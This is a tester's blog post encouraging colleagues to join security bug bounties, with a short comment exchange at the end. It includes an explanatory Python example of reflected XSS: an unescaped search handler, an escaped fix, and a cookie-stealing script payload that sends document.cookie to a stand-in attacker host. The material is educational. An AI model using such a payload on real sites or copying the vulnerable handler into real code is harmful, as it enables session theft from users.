I was recently added to Google's Security Hall of Fame, and I am quite honored and proud of that, even if getting the page updated has been a hassle.
But besides bragging about it, I really want to see more testers on similar hall of fame pages, for several reasons:
- Even if security is sometimes seen as a separate component, I would still include it in the testing area.
- It's a good way to practice testing-related skills; a very good exercise, I would say.
- It's quite fun. It can be frustrating to find a relevant issue, because there are many hunters out there and once a bug is found, Google fixes it very fast. But it's still fun, especially if you want to balance a boring routine job.
- I think it's good for us if testers appear there more often. It's a credibility point; it improves the way testing is seen a little bit.
- You can raise your individual reputation.
- You can earn some cash. It's not a huge amount, but you can break your personal record for the best-paid bug.
I can see why testers are reluctant to try it, or to focus more on this area, at least on bug bounties if not a full focus. I have some comments and suggested solutions:
- Time. Of course, time is the main limitation for people, but for that you have to make choices and decisions. Technically, though, 15 minutes is sometimes more than enough to find a bug and report it. Sure, that requires experience and knowledge that take more time to build, but I don't think testers start from zero when it comes to security.
- Target/Mission. I think testers assume they need to directly hack a server, run SQL queries on the database, or find a real major flaw to get the Google bounty, for example, so they are overwhelmed by the possible task. Well, even if finding something like that would be awesome and of course very important, the bounties don't reward only those issues. They also reward vulnerability classes that are considered high-impact based on statistics (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project), like XSS or CSRF. Don't be put off by the strange fancy names. You don't actually need to know the official labels to submit an interesting bug, although it would definitely help. Think more about the practical part, like: can you send someone a link to a URL on the google.com domain and be able to steal private data?
- Technical part. I think the technical parts here are not that many, and the biggest requirement is creativity/imagination. You may know about the 13-16-year-old hackers who did quite some damage to major platforms. I don't think they are that good technically; mostly they know how to speculate about a specific piece of functionality, multiply it, and put it into action.
- Competition. For sure there is a lot of competition in this area, and if you look at the security hall of fame of a major platform there aren't thousands of people there, but a relatively short list. However, there are now many public bug bounties, and each of those platforms has huge areas where a bug might hide. So I think it's still accessible, and competition cannot be used as a serious excuse.
There might be other things that make testers reluctant, but anyway I recommend giving it a shot.
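To make the "send someone a link and steal private data" idea from the Target/Mission point concrete, here is a minimal reflected XSS illustration in Python. It is an added example, not code from the original post or from any Google service: the search handler, the `search.example` and `attacker.example` hosts and the page markup are all made up. The vulnerable handler copies the `q` parameter from the URL into the page unescaped, so a crafted link runs the attacker's script in the victim's browser; the hardened handler HTML-escapes it first.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed example: a tiny "search results" page that reflects the
# q query parameter. Hypothetical hosts; no real service is involved.


def _query_param(url: str, name: str) -> str:
    """Return the first value of query parameter `name`, percent-decoded."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def vulnerable_search_page(url: str) -> str:
    """Reflected XSS: the parameter is pasted into the HTML unchanged."""
    q = _query_param(url, "q")
    return f"<h1>Results for: {q}</h1>"


def hardened_search_page(url: str) -> str:
    """Same page, but the parameter is HTML-escaped before it hits the markup."""
    q = _query_param(url, "q")
    return f"<h1>Results for: {html.escape(q, quote=True)}</h1>"


# The payload a hunter would put in the link sent to the victim: it sends
# the victim's cookies to a host the attacker controls (hypothetical).
PAYLOAD = "<script>location='https://attacker.example/?c='+document.cookie</script>"
MALICIOUS_LINK = "https://search.example/results?q=" + quote(PAYLOAD, safe="")


def contains_live_script(page: str) -> bool:
    """Crude check: does an unescaped <script> tag survive into the page?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print("link:      ", MALICIOUS_LINK)
    print("vulnerable:", vulnerable_search_page(MALICIOUS_LINK))
    print("hardened:  ", hardened_search_page(MALICIOUS_LINK))
```

The escaping shown is correct only for text placed in the HTML body; a value inserted into an attribute, a URL or inline JavaScript needs the encoding for that context, which is why a checker like `contains_live_script` is only a quick triage aid, not proof that a page is safe.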
Note: In security bug bounties you will encounter a few annoying things: bugs not getting approved (every bug bounty program is different), various kinds of conflicts with other vulnerability researchers, or... ANNOYING: not being added to the Google Hall of Fame (I had to send many emails until they finally remembered to add me to the list). However, there are many bug bounty programs out there. Examples: PayPal has a program you can try, because even a minor bug will be approved (with a minor bounty); Microsoft has a page where they don't pay you, but they put you on a list.
This is the fun part of bug bounty programs: if you don't like one program (like Google's bug bounty), there are others, and more and more companies are starting similar ones.
Out of curiosity, what vulnerability did you find?
An XSS in Google Analytics and a vulnerability in a Flash file.